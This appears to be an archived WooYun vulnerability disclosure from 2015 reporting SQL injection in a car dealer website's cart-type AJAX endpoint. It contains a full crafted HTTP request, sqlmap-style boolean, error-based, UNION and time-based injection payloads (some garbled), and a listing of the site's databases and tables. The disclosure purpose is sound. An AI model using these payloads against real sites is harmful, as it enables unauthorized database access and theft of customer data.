乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-16: 细节已通知厂商并且等待厂商处理中 2015-10-20: 厂商已经确认,细节仅向厂商公开 2015-10-30: 细节向核心白帽子及相关领域专家公开 2015-11-09: 细节向普通白帽子公开 2015-11-19: 细节向实习白帽子公开 2015-12-04: 细节向公众公开
RT
1、注入点
POST /buy/ajax_cartype.php HTTP/1.1Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36 NetsparkerAccept: text/javascript, text/html, application/xml, text/xml, */*Origin: http://**.**.**.**Referer: http://**.**.**.**/buy/price.phpX-Prototype-Version: 1.5.0_rc0X-Requested-With: XMLHttpRequestHost: **.**.**.**Cookie: PHPSESSID=um8dmjoj20r0okfh2hd9el5h52; flag_memberid=16951; flag_name=SmithAccept-Encoding: gzip, deflateProxy-Connection: Keep-AliveContent-Length: 57Content-Type: application/x-www-form-urlencodedcartypeid=%27+OR+%27ns%27%3d%27ns&t=0.843157094437629&_=3
2、涉及数据库:
Place: POSTParameter: cartypeid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cartypeid=' OR 'ns'='ns' AND 3395=3395 AND 'anFf'='anFf&t=0.84315794437629&_=3 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: cartypeid=' OR 'ns'='ns' AND (SELECT 6044 FROM(SELECT COUNT(*),CONAT(0x3a6578653a,(SELECT (CASE WHEN (6044=6044) THEN 1 ELSE 0 END)),0x3a6f6b6d3aFLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JFg'='JFbg&t=0.843157094437629&_=3 Type: UNION query Title: MySQL UNION query (NULL) - 64 columns Payload: cartypeid=' OR 'ns'='ns' LIMIT 1,1 UNION ALL SELECT NULL, NULL, NUL, CONCAT(0x3a6578653a,0x5556477641614e505855,0x3a6f6b6d3a), NULL, NULL, NULL,ULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,ULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL, NULL, NULL, NULL#&t=0.843157094437629&_=3 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cartypeid=' OR 'ns'='ns' AND SLEEP(5) AND 'NuxO'='NuxO&t=0.84315704437629&_=3---available databases [4]:[*] dealer[*] information_schema[*] news[*] test
3、tables
Database: dealer[87 tables]+----------------------+| actions || adminmanage || carfield || carinfo || cars || cartype || color_cars || colors || members || news || news_cartype || newstype || recom || setting || siteinfo || t_ad || t_ad1111 || t_admin || t_article || t_article11111 || t_car || t_cars || t_cars1111 || t_cou_50_ip_hits || t_cou_50_ip_limit || t_cou_adv || t_cou_alexa || t_cou_area || t_cou_bot || t_cou_browser || t_cou_city || t_cou_color || t_cou_country || t_cou_day_data || t_cou_holiday || t_cou_keyword || t_cou_language || t_cou_month_data || t_cou_page || t_cou_pagead || t_cou_pagedepth || t_cou_pageentry || t_cou_plug || t_cou_province || t_cou_referer || t_cou_returner || t_cou_screen || t_cou_similar || t_cou_site || t_cou_system || t_cou_timelong || t_cou_timezone || t_cou_user_site || t_cou_users || t_cou_year_data || t_dealer || t_dealer1111 || t_dealer1112 || t_dealer_1108 || t_dealer_1109 || t_dealer_1115 || t_dealer_1116 || t_dealer_bak20120914 || t_gbook || t_job || t_link || t_new_cars || t_new_class || t_new_event || t_new_focus || t_new_items || t_new_message || t_new_news || t_new_newsclass || t_new_reserve || t_new_testdrive || t_notice || t_photo || t_photo1111 || t_province_city || t_refinement || t_sessions || t_sort || t_sort_bak || t_sort_rename || t_user || t_way |+----------------------+
如上
过滤
危害等级:中
漏洞Rank:8
确认时间:2015-10-20 18:00
暂未建立与网站管理单位的直接处置渠道,待认领.
暂无
